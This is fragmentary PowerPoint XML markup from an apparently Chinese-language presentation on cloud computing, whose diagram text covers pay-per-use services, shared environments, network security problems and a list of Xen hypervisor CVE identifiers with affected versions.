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12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/diagrams/colors8.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.diagramColors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Default Extension="gif" ContentType="image/gif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diagrams/drawing9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79" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="305" r:id="rId5"/>
    <p:sldId id="306" r:id="rId6"/>
    <p:sldId id="307" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="282" r:id="rId9"/>
    <p:sldId id="292" r:id="rId10"/>
    <p:sldId id="283" r:id="rId11"/>
    <p:sldId id="293" r:id="rId12"/>
    <p:sldId id="287" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="286" r:id="rId15"/>
    <p:sldId id="316" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="301" r:id="rId18"/>
    <p:sldId id="308" r:id="rId19"/>
    <p:sldId id="303" r:id="rId20"/>
    <p:sldId id="304" r:id="rId21"/>
    <p:sldId id="309" r:id="rId22"/>
    <p:sldId id="312" r:id="rId23"/>
    <p:sldId id="302" r:id="rId24"/>
    <p:sldId id="315" r:id="rId25"/>
    <p:sldId id="314" r:id="rId26"/>
    <p:sldId id="289" r:id="rId27"/>
    <p:sldId id="299" r:id="rId28"/>
    <p:sldId id="298" r:id="rId29"/>
    <p:sldId id="300" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="268" r:id="rId32"/>
    <p:sldId id="259" r:id="rId33"/>
    <p:sldId id="258" r:id="rId34"/>
    <p:sldId id="310" r:id="rId35"/>
    <p:sldId id="261" r:id="rId36"/>
    <p:sldId id="311" r:id="rId37"/>
    <p:sldId id="278" r:id="rId38"/>
    <p:sldId id="313" r:id="rId39"/>
    <p:sldId id="280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F2013B-2609-4AF8-9A79-4C8FAED922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D8DD106-C7D3-4FA1-A4AC-87FC2F4474EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>按需使用，按需付费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678A1502-EFC5-4385-A7B8-9B1911C10D8D}" type="parTrans" cxnId="{77E76C14-0FAF-46EB-90A1-0C2D2C06BE65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9D0B118-DB45-4DDC-AA80-3B339D898C3F}" type="sibTrans" cxnId="{77E76C14-0FAF-46EB-90A1-0C2D2C06BE65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C141870-24BF-4BA6-89D3-734F9F91FFC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>专业运维服务化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DDC0EDF1-E861-4656-99EE-ABBAA1343F5A}" type="parTrans" cxnId="{74A8C185-65B2-45FE-8D00-95FFC7CD4D4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A7E96B6-9D09-4C30-AAC1-F7F3DEB4963A}" type="sibTrans" cxnId="{74A8C185-65B2-45FE-8D00-95FFC7CD4D4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8D929B2-BB29-4FA2-928A-3584246E60BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>快速部署，自助开通</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EFB1594-5541-4BF2-8812-912E292CA8DF}" type="parTrans" cxnId="{8C8975A4-D8D0-41AB-9F2B-51BA3BCB3A3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13F8640-6D20-473C-A083-F5B1151A446A}" type="sibTrans" cxnId="{8C8975A4-D8D0-41AB-9F2B-51BA3BCB3A3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702576F-68E7-41AE-8424-E4E47AC503E7}" type="pres">
      <dgm:prSet presAssocID="{A6F2013B-2609-4AF8-9A79-4C8FAED922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C179582-7D5C-4DC0-A177-C391B673EDF1}" type="pres">
      <dgm:prSet presAssocID="{9D8DD106-C7D3-4FA1-A4AC-87FC2F4474E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00A08E-E907-4827-9A06-1829D723E38B}" type="pres">
      <dgm:prSet presAssocID="{E9D0B118-DB45-4DDC-AA80-3B339D898C3F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7C36212-A3FE-4973-BE3E-CC4E29AE0B08}" type="pres">
      <dgm:prSet presAssocID="{1C141870-24BF-4BA6-89D3-734F9F91FFC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57555A-2E8D-48B6-B01D-915AEB46766A}" type="pres">
      <dgm:prSet presAssocID="{0A7E96B6-9D09-4C30-AAC1-F7F3DEB4963A}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AF237041-402B-4E27-AECE-D764C5331708}" type="pres">
      <dgm:prSet presAssocID="{A8D929B2-BB29-4FA2-928A-3584246E60B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7E76C14-0FAF-46EB-90A1-0C2D2C06BE65}" srcId="{A6F2013B-2609-4AF8-9A79-4C8FAED922A1}" destId="{9D8DD106-C7D3-4FA1-A4AC-87FC2F4474EA}" srcOrd="0" destOrd="0" parTransId="{678A1502-EFC5-4385-A7B8-9B1911C10D8D}" sibTransId="{E9D0B118-DB45-4DDC-AA80-3B339D898C3F}"/>
    <dgm:cxn modelId="{19D583AC-CAE3-4547-A796-970E33558E3D}" type="presOf" srcId="{A8D929B2-BB29-4FA2-928A-3584246E60BB}" destId="{AF237041-402B-4E27-AECE-D764C5331708}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8C8975A4-D8D0-41AB-9F2B-51BA3BCB3A3F}" srcId="{A6F2013B-2609-4AF8-9A79-4C8FAED922A1}" destId="{A8D929B2-BB29-4FA2-928A-3584246E60BB}" srcOrd="2" destOrd="0" parTransId="{9EFB1594-5541-4BF2-8812-912E292CA8DF}" sibTransId="{F13F8640-6D20-473C-A083-F5B1151A446A}"/>
    <dgm:cxn modelId="{5584CC68-9BA1-47CE-81F9-9ED6ADA626E1}" type="presOf" srcId="{A6F2013B-2609-4AF8-9A79-4C8FAED922A1}" destId="{6702576F-68E7-41AE-8424-E4E47AC503E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C27F354C-528A-4608-A4C5-A3BAB0D989F9}" type="presOf" srcId="{9D8DD106-C7D3-4FA1-A4AC-87FC2F4474EA}" destId="{3C179582-7D5C-4DC0-A177-C391B673EDF1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B6222899-3E19-4095-A3B2-FA2BD1A2C9EE}" type="presOf" srcId="{1C141870-24BF-4BA6-89D3-734F9F91FFC7}" destId="{E7C36212-A3FE-4973-BE3E-CC4E29AE0B08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{74A8C185-65B2-45FE-8D00-95FFC7CD4D44}" srcId="{A6F2013B-2609-4AF8-9A79-4C8FAED922A1}" destId="{1C141870-24BF-4BA6-89D3-734F9F91FFC7}" srcOrd="1" destOrd="0" parTransId="{DDC0EDF1-E861-4656-99EE-ABBAA1343F5A}" sibTransId="{0A7E96B6-9D09-4C30-AAC1-F7F3DEB4963A}"/>
    <dgm:cxn modelId="{95399D0A-DF70-4047-A203-C3EF1982DAD8}" type="presParOf" srcId="{6702576F-68E7-41AE-8424-E4E47AC503E7}" destId="{3C179582-7D5C-4DC0-A177-C391B673EDF1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{11181832-7BF2-4EB4-B7E7-B68ADA214346}" type="presParOf" srcId="{6702576F-68E7-41AE-8424-E4E47AC503E7}" destId="{3C00A08E-E907-4827-9A06-1829D723E38B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6DC63540-1562-4516-B037-033242FF659C}" type="presParOf" srcId="{6702576F-68E7-41AE-8424-E4E47AC503E7}" destId="{E7C36212-A3FE-4973-BE3E-CC4E29AE0B08}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0AC1ADAC-74A1-40A0-BCD1-3DA1AA34A34D}" type="presParOf" srcId="{6702576F-68E7-41AE-8424-E4E47AC503E7}" destId="{E657555A-2E8D-48B6-B01D-915AEB46766A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2E4665C9-1779-47A4-8092-4D39CEDACF64}" type="presParOf" srcId="{6702576F-68E7-41AE-8424-E4E47AC503E7}" destId="{AF237041-402B-4E27-AECE-D764C533170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D77AD2-FFB4-4322-AD89-6225BC47D1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4A46127E-BCAD-49AB-B1BA-816F42A90B3E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>巨大的共享环境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B2714F66-8B37-4E13-A98F-10E667A125A8}" type="parTrans" cxnId="{C2A6CEC2-84CB-4BC9-BD8D-118FDE1E78F6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E5263A7-AE8C-4536-8C57-1DBE3A6CA93E}" type="sibTrans" cxnId="{C2A6CEC2-84CB-4BC9-BD8D-118FDE1E78F6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7063223-D022-4CEB-95F0-0D3836605209}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>网络安全问题</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73DE5EAD-C0C2-4929-B0D7-53184ED04BCA}" type="parTrans" cxnId="{AAD4DB3C-C267-434D-8E01-FB83D89EC58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6DEB0EF-85DD-40C9-88D1-BC52D2894E5A}" type="sibTrans" cxnId="{AAD4DB3C-C267-434D-8E01-FB83D89EC58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AE27DEF-8F72-480D-ADEE-4048B25716F8}" type="pres">
      <dgm:prSet presAssocID="{BDD77AD2-FFB4-4322-AD89-6225BC47D1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8A160A-DA2E-453A-8B79-ECC493B50092}" type="pres">
      <dgm:prSet presAssocID="{4A46127E-BCAD-49AB-B1BA-816F42A90B3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B67BF4-0CC5-4116-99FE-F0E64F5709D4}" type="pres">
      <dgm:prSet presAssocID="{CE5263A7-AE8C-4536-8C57-1DBE3A6CA93E}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}" type="pres">
      <dgm:prSet presAssocID="{A7063223-D022-4CEB-95F0-0D383660520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2A6CEC2-84CB-4BC9-BD8D-118FDE1E78F6}" srcId="{BDD77AD2-FFB4-4322-AD89-6225BC47D1DA}" destId="{4A46127E-BCAD-49AB-B1BA-816F42A90B3E}" srcOrd="0" destOrd="0" parTransId="{B2714F66-8B37-4E13-A98F-10E667A125A8}" sibTransId="{CE5263A7-AE8C-4536-8C57-1DBE3A6CA93E}"/>
    <dgm:cxn modelId="{B8E13F05-B030-431A-B35E-F6E8ADD669FE}" type="presOf" srcId="{BDD77AD2-FFB4-4322-AD89-6225BC47D1DA}" destId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8A022AEE-808B-45AE-AFAB-6181704A8856}" type="presOf" srcId="{4A46127E-BCAD-49AB-B1BA-816F42A90B3E}" destId="{728A160A-DA2E-453A-8B79-ECC493B50092}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AAD4DB3C-C267-434D-8E01-FB83D89EC588}" srcId="{BDD77AD2-FFB4-4322-AD89-6225BC47D1DA}" destId="{A7063223-D022-4CEB-95F0-0D3836605209}" srcOrd="1" destOrd="0" parTransId="{73DE5EAD-C0C2-4929-B0D7-53184ED04BCA}" sibTransId="{66DEB0EF-85DD-40C9-88D1-BC52D2894E5A}"/>
    <dgm:cxn modelId="{0D05C024-50F0-4F52-9CD3-B25E9D2A893D}" type="presOf" srcId="{A7063223-D022-4CEB-95F0-0D3836605209}" destId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9838B341-204D-42F1-BC2D-4D237FCA76E6}" type="presParOf" srcId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" destId="{728A160A-DA2E-453A-8B79-ECC493B50092}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BABFE8D9-D0B0-4367-8A42-8DCACD2BA742}" type="presParOf" srcId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" destId="{47B67BF4-0CC5-4116-99FE-F0E64F5709D4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{066C1D0A-07C2-4637-91F0-1B5041BB8EC2}" type="presParOf" srcId="{3AE27DEF-8F72-480D-ADEE-4048B25716F8}" destId="{FC7C6660-F579-4724-9ADC-1C6F75A0020B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList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3270DE-7325-48B8-86F7-DCAC61C900F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993C51-1B33-4C4E-8134-D80145218AD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5517EC94-86E7-49FE-A807-D283C283E46B}" type="parTrans" cxnId="{F30AC978-3039-495D-84BA-1A3096C6ECDD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02581549-58DC-4E66-8CAC-C5D658BA604A}" type="sibTrans" cxnId="{F30AC978-3039-495D-84BA-1A3096C6ECDD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E56D4CDF-18CA-4B6B-A0FB-3799A5C28248}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>CVE-2012-2625</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>   XEN 4.x</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37AC9DDD-2997-46C7-A2AE-5010830E3D18}" type="parTrans" cxnId="{AE73C49F-098D-41E4-9C2C-73DFDDBE4485}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F639014-D8F5-4C2D-AE90-EB9CA0BCC511}" type="sibTrans" cxnId="{AE73C49F-098D-41E4-9C2C-73DFDDBE4485}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D7D6226-9387-4ED6-821F-BB9C800C774E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B15D4EEB-D1D7-407E-91A2-998CB8D5B79F}" type="parTrans" cxnId="{FCC4F32B-2123-443D-9FE8-52AF67265281}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CAD28394-97DC-4D7B-88F0-7FA78625E463}" type="sibTrans" cxnId="{FCC4F32B-2123-443D-9FE8-52AF67265281}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F468D98-511E-4A73-93A5-EDC395C60563}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>CVE-2010-4255</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>   XEN 4.0.1</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B059E150-6C94-4C4C-8333-D0EEA5F7E796}" type="parTrans" cxnId="{0E16004C-5CE9-4C37-B8DF-5BE36A6C0930}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70265975-D185-4B9F-AB0D-25B0A301C382}" type="sibTrans" cxnId="{0E16004C-5CE9-4C37-B8DF-5BE36A6C0930}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3168598A-CE75-4D5A-A0CD-5A2C63BFE78E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A98DBA19-C202-4DAD-A22A-06DAD5EB7163}" type="parTrans" cxnId="{2B243C4D-F589-4965-AB72-D0C632E19BF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F507547-DC1A-4B81-8E08-4C17EC3C8C4E}" type="sibTrans" cxnId="{2B243C4D-F589-4965-AB72-D0C632E19BF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7967A301-D288-48C1-BF02-17289093F02A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>CVE-2010-4247  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t> XEN 3.4.0 </a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A093F016-5500-4797-8045-2B47B8CBC6A0}" type="parTrans" cxnId="{BFCF4FB9-FADB-499F-9349-4C42F3FDB3CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{078940EF-71C0-4930-BBE1-D6B656719CEF}" type="sibTrans" cxnId="{BFCF4FB9-FADB-499F-9349-4C42F3FDB3CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABEFE3BF-3CF2-4656-808A-45B2194528E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{331057B4-5332-4050-9A14-695ECA60670E}" type="parTrans" cxnId="{174B7E02-17C4-4B44-ABC6-E6C06E01C305}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A19F22C-39D9-42EB-B4E2-007F11B8BB7F}" type="sibTrans" cxnId="{174B7E02-17C4-4B44-ABC6-E6C06E01C305}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C668E882-8A25-4270-8642-643BE61F23C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>CVE-2010-3699</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>   XEN 3.x</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F6E71A3-513A-4C40-8F0B-95387B0971D3}" type="parTrans" cxnId="{1A4D56E5-39C5-4919-B917-C91964B0DE20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B353FDD0-7F9A-42A5-BCE5-8D4E9402D785}" type="sibTrans" cxnId="{1A4D56E5-39C5-4919-B917-C91964B0DE20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC07617A-849A-4E53-BAFF-0A823D4B1D30}" type="pres">
      <dgm:prSet presAssocID="{553270DE-7325-48B8-86F7-DCAC61C900F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F5C0034-5CDE-4624-A164-36A3C7A05C7D}" type="pres">
      <dgm:prSet presAssocID="{00993C51-1B33-4C4E-8134-D80145218AD4}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0E2C60EE-B2DF-48E7-B6EC-3C0545E71FA8}" type="pres">
      <dgm:prSet presAssocID="{00993C51-1B33-4C4E-8134-D80145218AD4}" presName="imgShp" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="1" custScaleX="97507" custScaleY="100957" custLinFactNeighborX="-14670" custLinFactNeighborY="-458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468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" type="pres">
      <dgm:prSet presAssocID="{00993C51-1B33-4C4E-8134-D80145218AD4}" presName="txShp" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="1" custScaleX="112980" custScaleY="144630" custLinFactNeighborX="1127" custLinFactNeighborY="-40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C4F32B-2123-443D-9FE8-52AF67265281}" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{9D7D6226-9387-4ED6-821F-BB9C800C774E}" srcOrd="1" destOrd="0" parTransId="{B15D4EEB-D1D7-407E-91A2-998CB8D5B79F}" sibTransId="{CAD28394-97DC-4D7B-88F0-7FA78625E463}"/>
    <dgm:cxn modelId="{32566DF5-8E74-4218-8F89-79FC122ED1E8}" type="presOf" srcId="{C668E882-8A25-4270-8642-643BE61F23C3}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="7" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{0E16004C-5CE9-4C37-B8DF-5BE36A6C0930}" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{4F468D98-511E-4A73-93A5-EDC395C60563}" srcOrd="2" destOrd="0" parTransId="{B059E150-6C94-4C4C-8333-D0EEA5F7E796}" sibTransId="{70265975-D185-4B9F-AB0D-25B0A301C382}"/>
    <dgm:cxn modelId="{37105469-B06B-4F58-8AB0-F467EC5220FB}" type="presOf" srcId="{ABEFE3BF-3CF2-4656-808A-45B2194528E2}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="6" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{13493062-9F27-4B2C-B738-16134D923399}" type="presOf" srcId="{4F468D98-511E-4A73-93A5-EDC395C60563}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{E26F9D49-12ED-425F-85F8-122D426005A2}" type="presOf" srcId="{9D7D6226-9387-4ED6-821F-BB9C800C774E}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{A6408EA2-4688-4217-B679-63F78879269C}" type="presOf" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{E9C78BA1-EA9F-4D42-892B-1831C4003F08}" type="presOf" srcId="{3168598A-CE75-4D5A-A0CD-5A2C63BFE78E}" destId="{468E0513-D5D9-4ED1-8F04-2F75C9EFC413}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{BFCF4FB9-FADB-499F-9349-4C42F3FDB3CE}" srcId="{00993C51-1B33-4C4E-8134-D80145218AD4}" destId="{7967A301-D288-48C1-BF02-17289093F02A}" srcOrd="4" destOrd="0" parTransId="{A093F016-5500-4797-8045-2B47B8CBC6A0}" sibTransId="{078940EF-71C0-4930-BBE1-D6B656719CEF}"/>
